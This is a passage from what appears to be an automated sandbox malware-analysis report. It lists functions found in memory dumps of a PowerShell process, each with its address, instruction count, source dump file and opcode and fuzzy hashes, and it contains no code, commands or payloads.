                  • Instruction Fuzzy Hash: 2402E222B0EBC64FE796E73858693B47FE1FF57610B0941FAC08DCB193E958A8468351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A57D5BA5 Relevance: .4, Instructions: 419COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b59e45b9c73c8765b4468be231dfbdaf4a0ffc96b1aca6b898ef176ad789f397
                  • Instruction ID: 356914f02f81ff008261a758a9b8315a41abb98897dca5339ea8db7e34681e95
                  • Opcode Fuzzy Hash: b59e45b9c73c8765b4468be231dfbdaf4a0ffc96b1aca6b898ef176ad789f397
                  • Instruction Fuzzy Hash: 24C13932A0EB8A4FE7A6E72858956B57FE1EF67710B0800FFD48DCB193D918A805C751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A5AD06BF Relevance: .2, Instructions: 220COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.469401737.00007FF9A5AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5AD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5ad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d17662c22485fa23aaee8442dbb20960e9006983c2b8218c81ee86087dc558d2
                  • Instruction ID: 14683fde84bebe04474666e6f7cbf72eb8c5bc84e3342510331a3acd1def96aa
                  • Opcode Fuzzy Hash: d17662c22485fa23aaee8442dbb20960e9006983c2b8218c81ee86087dc558d2
                  • Instruction Fuzzy Hash: 3161BD23F1EB860FE7E9E62854693B86AD1FF56B10B5800BED08DC7182FD59BC058381
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A57D5C7A Relevance: .2, Instructions: 172COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 651c67da44f19faf48e26c2202e31c5663be67ff05cc245ac70d0366a2ce1b04
                  • Instruction ID: 55f324a82d8536b06802404a76bc5fcc9ca4dd1a443fb46bffc661c3ebbb0280
                  • Opcode Fuzzy Hash: 651c67da44f19faf48e26c2202e31c5663be67ff05cc245ac70d0366a2ce1b04
                  • Instruction Fuzzy Hash: 5E51F122B0FB864FE7A6E72844A52B87BD1EF27650B5800FEC08DDB1C3D919AC058B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A57D0665 Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 585b15f3759bf3b66218705270263627e3d01a1d827831d5409bf67b8b9965e3
                  • Instruction ID: 672d2fbd05186fd226fb522cb7d44b5ae20a264da8d4bff22dd47a01907b1432
                  • Opcode Fuzzy Hash: 585b15f3759bf3b66218705270263627e3d01a1d827831d5409bf67b8b9965e3
                  • Instruction Fuzzy Hash: 37310112B0EBC90FD7828B3D68646B07FE1EF97610B0D01FBC0C8CB1A3E94AA8458751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A57D0545 Relevance: .1, Instructions: 126COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c066d33b954d845baff4319381a4cacccb227ef46752664da600818b7e6b5438
                  • Instruction ID: 0724fff449312ea14dc6cc103992b4a7e0f841982cc56c8275ee09b83ac3bdbe
                  • Opcode Fuzzy Hash: c066d33b954d845baff4319381a4cacccb227ef46752664da600818b7e6b5438
                  • Instruction Fuzzy Hash: 49319E52A0F7C55FE342977968292746FA0EF576A0B1940FBD4C9DB093E8892C098762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00007FF9A570DE43 Relevance: 1.8, Strings: 1, Instructions: 523COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: F^_H
                  • API String ID: 0-3158135678
                  • Opcode ID: 29f33100cbe2ad7613e11fc584df417351b3b1ad0a1f23b25bbf5592f90d2912
                  • Instruction ID: 8ceabce5cba4da242bd8a32e509dafe342320320aa556b0cd86a696ec80b841c
                  • Opcode Fuzzy Hash: 29f33100cbe2ad7613e11fc584df417351b3b1ad0a1f23b25bbf5592f90d2912
                  • Instruction Fuzzy Hash: E4F10271B0EB8A4FDB56D738A8146B57BE1EF97710B0941FAD48CCB193DE586806C382
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A5700CD0 Relevance: .4, Instructions: 376COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1bf4d03069e8cde45dd41f688b9abb282415f1d1ea7a76b0342299edc4ada48
                  • Instruction ID: d97d97b706841877691d90de4ec4ac9d88c17d7b0c0f4631cb79d6dc5e86009b
                  • Opcode Fuzzy Hash: f1bf4d03069e8cde45dd41f688b9abb282415f1d1ea7a76b0342299edc4ada48
                  • Instruction Fuzzy Hash: 66B16A31B1DA4A4FDB69DB1CE880671B7D1FF46710B1485BEC4CEC7592DA65B842C780
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A5700D30 Relevance: .2, Instructions: 231COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1f6f7545bcec471c489e9e03b324763d407a09dbe07d598490c5cde66ea6877
                  • Instruction ID: 9a3800922d792bce02dd78b9751d49b474ec7c3f6387bd824bea8de5d15cf8e7
                  • Opcode Fuzzy Hash: b1f6f7545bcec471c489e9e03b324763d407a09dbe07d598490c5cde66ea6877
                  • Instruction Fuzzy Hash: 9A513A32A0DA594FEB58DB69A8852F277D0EB86720B05817BD4CEC7193D9687C458380
                  Uniqueness

                  Uniqueness Score: -1.00%